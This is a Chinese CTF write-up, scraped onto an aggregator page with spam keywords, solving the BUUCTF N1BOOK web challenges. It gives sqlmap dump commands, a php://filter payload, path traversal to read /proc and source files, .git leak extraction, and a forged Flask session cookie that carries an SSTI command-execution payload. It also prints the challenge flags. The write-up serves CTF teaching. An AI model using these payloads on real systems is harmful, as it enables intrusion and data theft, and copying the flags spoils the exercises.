国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān)

2年前作者:hacker-routing分類:Toy博客閱讀(15)違法舉報

這篇具有很好參考價值的文章主要介紹了【BUUCTF N1BOOK】[第一章 web入門] 通關(guān)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

?? 博主介紹

????? 博主介紹:大家好,我是 hacker-routing ,很高興認(rèn)識大家~
?主攻領(lǐng)域:【滲透領(lǐng)域】【應(yīng)急響應(yīng)】 【python】 【VulnHub靶場復(fù)現(xiàn)】【面試分析】
??點贊?評論?收藏 == 養(yǎng)成習(xí)慣(一鍵三連)??
??歡迎關(guān)注??一起學(xué)習(xí)??一起討論??一起進(jìn)步??文末有彩蛋
??作者水平有限,歡迎各位大佬指點,相互學(xué)習(xí)進(jìn)步!

目錄

前言

[第一章 web入門]常見的搜集

robots.txt有flag1

index.php~有flag2

.index.php.swp有flag3

[第一章 web入門]SQL注入-1

sqlmap一把梭

[第一章 web入門]afr_1

php偽協(xié)議

[第一章 web入門]afr_2

目錄穿越,文件讀取

[第一章 web入門]粗心的小李

1.下載GitHack

2..git/泄漏

[第一章 web入門]afr_3

前言

N1BOOKNu1L Team為方便讀者打造的免費平臺,讀者可在上面享受書籍相關(guān)資源以及查閱勘誤。

[第一章 web入門]常見的搜集

n1book{info_1s_v3ry_imp0rtant_hack}

這里提示敏感文件,這里使用御劍掃描不到目錄

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

我這里使用dirsearch掃描網(wǎng)站目錄:

┌──(root??kali)-[~]
└─# dirsearch -u http://9fa5191e-fbba-4744-bff4-6f7a789577b3.node5.buuoj.cn:81/ -e*

-e* 參數(shù),通常來說,它應(yīng)該被替換為具體的文件擴(kuò)展名,以便進(jìn)行目標(biāo)網(wǎng)站的有針對性掃描

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

robots.txt有flag1

flag1:n1book{info_1

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

index.php~有flag2

flag2:s_v3ry_im

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

.index.php.swp有flag3

flag3:p0rtant_hack}

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

拼接起來,flag是:n1book{info_1s_v3ry_imp0rtant_hack}

[第一章 web入門]SQL注入-1

n1book{union_select_is_so_cool}

這里我給大家搞好了閉合點,這個很簡單,通過簡單的判斷就可以出來

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

sqlmap一把梭

感興趣的小伙伴們可以嘗試下利用手工聯(lián)合注入,我這里直接利用sqlmap跑

sqlmap -u "http://55d95487-415f-4693-9101-e6abda4bbb48.node5.buuoj.cn:81/index.php?id=1" --dbs --batch   ##跑庫

sqlmap -u "http://55d95487-415f-4693-9101-e6abda4bbb48.node5.buuoj.cn:81/index.php?id=1" -D note --tables --batch      ##跑表

sqlmap -u "http://55d95487-415f-4693-9101-e6abda4bbb48.node5.buuoj.cn:81/index.php?id=1" -D note -T fl4g --columns --batch    ##跑列

sqlmap -u "http://55d95487-415f-4693-9101-e6abda4bbb48.node5.buuoj.cn:81/index.php?id=1" -D note -T fl4g -C 'fllllag' --dump  --batch   ##跑字段

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

[第一章 web入門]afr_1

http://cba81709-c243-48c4-b593-837760ff0de5.node5.buuoj.cn:81/

n1book{afr_1_solved}

php偽協(xié)議

直接利用php偽協(xié)議讀取flag

?p=php://filter/convert.base64-encode/resource=flag

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

[第一章 web入門]afr_2

n1book{afr_2_solved}

http://e1003d70-123f-4635-8946-a3674a107066.node5.buuoj.cn:81/

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

右擊查看網(wǎng)頁源代碼,發(fā)現(xiàn)有個/img目錄

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

目錄穿越,文件讀取

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

[第一章 web入門]粗心的小李

n1book{git_looks_s0_easyfun}

1.下載GitHack

GitCode - 開發(fā)者的代碼家園https://gitcode.com/lijiejie/githack/overview?utm_source=csdn_github_accelerator&isLogin=1【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

2..git/泄漏

python GitHack.py http://b376ab2f-a56f-49fe-8887-b0275fba45a1.node5.buuoj.cn:81/.git/

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

會生成一個index.html文件,打開就可以拿到flag了

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

[第一章 web入門]afr_3

n1book{afr_3_solved}

提交一個123上去

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

然后查看文章,發(fā)現(xiàn)url有傳參

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

隨便輸入一個123,發(fā)現(xiàn)這里可能存在目錄穿越或者文件包含漏洞

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

發(fā)現(xiàn)一個server.py文件

http://f70723e8-84fa-4861-b580-63657fa57ec5.node5.buuoj.cn:81/article?name=../../../../../proc/self/cmdline

在 Linux 系統(tǒng)中,/proc/self/cmdline 是一個特殊的文件,它包含了當(dāng)前進(jìn)程的命令行參數(shù)。通過讀取這個文件,可以獲取當(dāng)前進(jìn)程的命令行參數(shù)。

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

http://f70723e8-84fa-4861-b580-63657fa57ec5.node5.buuoj.cn:81/article?name=../../../../../proc/self/cwd/server.py

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

這里發(fā)現(xiàn)flag.py和key.py

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

flag.py不允許訪問

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

#!/usr/bin/python key = 'Drmhze6EPcv0fN_81Bj-nA'

在 Linux 中,/proc/self/cwd/ 是一個特殊的符號鏈接,它指向當(dāng)前進(jìn)程的當(dāng)前工作目錄。通過將 ../../../../../proc/self/cwd/key.py 附加到網(wǎng)站的地址中,你嘗試獲取當(dāng)前工作目錄下的 key.py 文件。

根據(jù)你提供的信息,得到的文件內(nèi)容是 #!/usr/bin/python key = 'Drmhze6EPcv0fN_81Bj-nA'。這個文件內(nèi)容表示是一個以 Python 編寫的腳本,定義了一個名為 key 的變量,并給它賦了 'Drmhze6EPcv0fN_81Bj-nA' 這個字符串值。

加密腳本的獲取方式

?git clone https://github.com/noraj/flask-session-cookie-manager

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

┌──(root??kali)-[~/桌面/flask-session-cookie-manager]
└─# python3 flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"
.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.Zb9oCQ.Nn27TDkaahhdaRVZ6bm4ktrMcpI

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF

當(dāng)我們使用腳本得到session時,我們需要抓包,進(jìn)行偽造cookie,得到flag

.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.Zb9oCQ.Nn27TDkaahhdaRVZ6bm4ktrMcpI

【BUUCTF N1BOOK】[第一章 web入門] 通關(guān),CTF奪旗賽,web,前端,javascript,開發(fā)語言,web安全,vulnhub,BUUCTF,CTF文章來源地址http://www.zghlxwxcb.cn/news/detail-829832.html

到了這里,關(guān)于【BUUCTF N1BOOK】[第一章 web入門] 通關(guān)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • BUUCTF-練習(xí)場-WEB-第一部分(8道)

    BUUCTF-練習(xí)場-WEB-第一部分(8道)

    payload: 1\\\' or 1=1# \\\'是閉合前面的查詢語句,or 1=1恒成立,可以使用or句子繞過判斷,#用于注釋,注釋后面的內(nèi)容不再執(zhí)行,所以該sql命令會返回表內(nèi)所有內(nèi)容,其實就是實現(xiàn)一個閉合查詢,繞過判斷,返回內(nèi)容 F12查看源代碼,發(fā)現(xiàn)注釋中有一個source.php文件名稱 訪問這個文件

    2024年02月06日
    瀏覽(22)
  • 第一章 小程序入門

    第一章 小程序入門

    小程序的基本結(jié)構(gòu) 小程序的頁面組成部分 JSON 配置文件的作用 app.json 配置文件 project.config.json 配置文件 sitemap.json 配置文件 頁面 .json 配置文件 什么是 wxml wxml 和 html 的區(qū)別 什么是 wxss wxss 和 css 的區(qū)別 通信模型 小程序的啟動過程 頁面渲染過程 button 按鈕的基本使用 img 組件

    2024年02月08日
    瀏覽(27)
  • ElasticSearch第一章(入門介紹)

    ElasticSearch第一章(入門介紹)

    ElasticSearch(彈性搜索),簡稱ES。 ES是一個分布式,RESTFul風(fēng)格的搜索和數(shù)據(jù)分析引擎 ,能夠解決不斷涌現(xiàn)出的各種用例。作為 Elastic Stack(Elastic技術(shù)棧簡稱ELK) 的核心,Elasticsearch 會集中存儲您的數(shù)據(jù),讓您飛快完成搜索,微調(diào)相關(guān)性,進(jìn)行強大的分析,并輕松縮放規(guī)模。 我

    2024年02月22日
    瀏覽(25)

  • 第一章 MATLAB入門

    MATLAB(矩陣實驗室的簡稱)是一種專業(yè)的計算機程序,用于工程科學(xué)的矩陣數(shù)學(xué)運算。但 在以后的幾年內(nèi),它逐漸發(fā)展為一種極其靈活的計算體系,用于解決各種重要的技術(shù)問題。 Matlab程序執(zhí)行MATLAB語言,并提供了一個極其廣泛的預(yù)定義函數(shù)庫,這樣就使得技術(shù)工作 變得簡

    2024年02月05日
    瀏覽(19)

  • 第一章 快速入門

    TypeScript是JavaScript的超集。 它對JS進(jìn)行了擴(kuò)展,向JS中引入了類型的概念,并添加了許多新的特性。 TS代碼需要通過編譯器編譯為JS,然后再交由JS解析器執(zhí)行。 TS完全兼容JS,換言之,任何的JS代碼都可以直接當(dāng)成JS使用。 相較于JS而言,TS擁有了靜態(tài)類型,更加嚴(yán)格的語法,更

    2024年02月01日
    瀏覽(21)
  • 第一章:SpringBoot基礎(chǔ)入門

    第一章:SpringBoot基礎(chǔ)入門

    Spring 能做什么 Spring 的能力 Spring 的生態(tài) 網(wǎng)址: https://spring.io/projects/spring-boot 覆蓋了: Web 開發(fā)、數(shù)據(jù)訪問、安全控制、分布式、消息服務(wù)、移動開發(fā)、批處理等。 Spring5 重大升級 響應(yīng)式編程 內(nèi)部源碼設(shè)計 基于 Java8 的一些新特性。 為什么用 SpringBoot ? Spring Boot makes it eas

    2024年02月12日
    瀏覽(27)

  • ChatGPT入門到高級【第一章】

    第一章:Chatgpt的起源和發(fā)展 1.1 人工智能和Chatbot的概念 1.2 Chatbot的歷史發(fā)展 1.3 機器學(xué)習(xí)技術(shù)在Chatbot中的應(yīng)用 1.4 Chatgpt的誕生和發(fā)展 第二章:Chatgpt的技術(shù)原理 2.1 自然語言處理技術(shù) 2.2 深度學(xué)習(xí)技術(shù) 2.3 Transformer模型 2.4 GPT模型 第三章:Chatgpt的應(yīng)用場景 3.1 智能客服 3.2 智能問

    2024年02月04日
    瀏覽(19)
  • 【Matlab入門】 第一章 Matlab基礎(chǔ)

    【Matlab入門】 第一章 Matlab基礎(chǔ)

    你好!歡迎查看此系列筆記。為何說是筆記而不是教程呢,是因為這就是真真切切的我自己學(xué)習(xí)的記錄,從R2022a版本到R2024a,這意味著該系列筆記可能會一直更新下去,倘若有重大更迭,我也會及時更新。觀看者遇到問題,可以在評論區(qū)反饋,我爭取及時交流修改。初始筆記

    2024年02月20日
    瀏覽(25)

  • Linux——(第一章)Linux的入門

    VMwear workstations下載及安裝 Ubuntu server 18.04安裝 VScode下載與安裝 使用VS Code連接遠(yuǎn)程服務(wù)器 MobaXterm的下載安裝及遠(yuǎn)程連接 Filezila的下載、安裝與使用(向服務(wù)器傳輸文件) 目錄 1.概述 2.Linux和Windows的區(qū)別 3.VM的安裝與使用 ? ? ? ? Linux內(nèi)核最早由芬蘭人林納斯·托瓦茲(Linus

    2024年02月10日
    瀏覽(26)
  • 第一章 無人機入門(二)軟件架構(gòu)

    第一章 無人機入門(二)軟件架構(gòu)

    之前我寫了一篇關(guān)于無人機硬件架構(gòu)的博客,接下來我繼續(xù)寫關(guān)于軟件架構(gòu)的。 什么是軟件?百度百科里面軟件的定義是“按照特定順序組織的計算機數(shù)據(jù)和指令的集合”,在這里我們只需要理解為程序即可,也就是說我們的軟件,是運行在計算機(不論是Intel還是AMD亦或者

    2024年02月08日
    瀏覽(23)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包